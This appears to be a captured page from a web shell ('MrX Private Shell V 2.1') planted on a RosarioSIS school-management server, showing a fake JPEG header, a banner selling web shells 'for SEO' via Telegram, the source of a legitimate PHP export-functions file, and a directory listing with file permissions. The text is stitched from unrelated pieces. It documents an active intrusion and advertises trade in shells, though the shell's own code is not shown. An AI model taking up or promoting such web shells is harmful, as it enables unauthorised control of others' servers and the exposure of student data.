����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Functions used by the `misc/Export.php` program
*
* @package RosarioSIS
* @subpackage ProgramFunctions
*/
/**
* Make Next School
* Local function for `misc/Export.php` program
*
* DBGet() callback function
*
* @global $THIS_RET Current row in the results
*
* @param string $value Next School value.
* @param string $column 'NEXT_SCHOOL' Column.
*
* @return string Next school text.
*/
function _makeNextSchool( $value, $column )
{
global $THIS_RET;
static $schools_RET;
if ( is_null( $value ) )
{
return '';
}
if ( $value == '0' )
{
return _( 'Retain' );
}
elseif ( $value == '-1' )
{
return _( 'Do not enroll after this school year' );
}
if ( ! $schools_RET )
{
$schools_RET = DBGet( "SELECT ID,TITLE
FROM schools WHERE
SYEAR='" . UserSyear() . "'", [], [ 'ID' ] );
}
$school_title = $schools_RET[ $value ][1]['TITLE'];
if ( $value == $THIS_RET['SCHOOL_ID'] )
{
return _( 'Next Grade at ' ) . $school_title;
}
else
return $school_title;
}
/**
* Make Calendar
* Local function for `misc/Export.php` program
*
* DBGet() callback function
*
* @static $calendars_RET Calendar titles for all schools.
*
* @param string $value Calendar ID value.
* @param string $column 'CALENDAR_ID' Column.
*
* @return string Calendar title.
*/
function _makeCalendar( $value, $column )
{
static $calendars_RET = false;
if ( ! $calendars_RET )
{
$calendars_RET = DBGet( "SELECT CALENDAR_ID,DEFAULT_CALENDAR,TITLE
FROM attendance_calendars
WHERE SYEAR='" . UserSyear() . "'", [], [ 'CALENDAR_ID' ] );
}
return issetVal( $calendars_RET[ $value ][1]['TITLE'], '' );
}
/**
* Make Teachers
* Local function for `misc/Export.php` program
*
* DBGet() callback function
*
* @deprecated since 10.3.1 Use SQL result as comma separated list instead
*
* @param string $value Period teachers value.
* @param string $column 'PERIOD_' . $period['PERIOD_ID'] Column.
*
* @return string Formatted teachers, one per line.
*/
function _makeTeachers( $value, $column )
{
if ( $value === '{}' )
{
return '';
}
$teachers = explode( '","', mb_substr( $value, 2, -2 ) );
return implode( '<br>', $teachers );
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| PHPCompatibility | Folder | 0755 |
|
|
| Charts.fnc.php | File | 6.03 KB | 0644 |
|
| Dashboard.fnc.php | File | 2.79 KB | 0644 |
|
| DashboardModule.fnc.php | File | 6.17 KB | 0644 |
|
| Debug.fnc.php | File | 1.56 KB | 0644 |
|
| Fields.fnc.php | File | 20.17 KB | 0644 |
|
| FileUpload.fnc.php | File | 25.36 KB | 0644 |
|
| FirstLogin.fnc.php | File | 9.19 KB | 0644 |
|
| HackingLog.fnc.php | File | 2.41 KB | 0644 |
|
| Help.fnc.php | File | 5.03 KB | 0644 |
|
| Linkify.fnc.php | File | 1.19 KB | 0644 |
|
| MailingLabel.fnc.php | File | 3.7 KB | 0644 |
|
| MarkDownHTML.fnc.php | File | 6.87 KB | 0644 |
|
| PortalPollsNotes.fnc.php | File | 14.16 KB | 0644 |
|
| README | File | 267 B | 0644 |
|
| SchoolPeriodsSelectInput.fnc.php | File | 3.15 KB | 0644 |
|
| SendEmail.fnc.php | File | 5.05 KB | 0644 |
|
| SendNotification.fnc.php | File | 10.85 KB | 0644 |
|
| StudentsUsersInfo.fnc.php | File | 23.68 KB | 0644 |
|
| Substitutions.fnc.php | File | 7.63 KB | 0644 |
|
| Template.fnc.php | File | 3.21 KB | 0644 |
|
| Theme.fnc.php | File | 1.93 KB | 0644 |
|
| TipMessage.fnc.php | File | 3.7 KB | 0644 |
|
| Update.fnc.php | File | 35.17 KB | 0644 |
|
| UpdateV2_3.fnc.php | File | 16.27 KB | 0644 |
|
| UpdateV4_5.fnc.php | File | 58.61 KB | 0644 |
|
| UpdateV6_8_9.fnc.php | File | 22.19 KB | 0644 |
|
| UserAgent.fnc.php | File | 1.68 KB | 0644 |
|
| _makeLetterGrade.fnc.php | File | 4.03 KB | 0644 |
|
| _makePercentGrade.fnc.php | File | 2.73 KB | 0644 |
|
| miscExport.fnc.php | File | 2.17 KB | 0644 |
|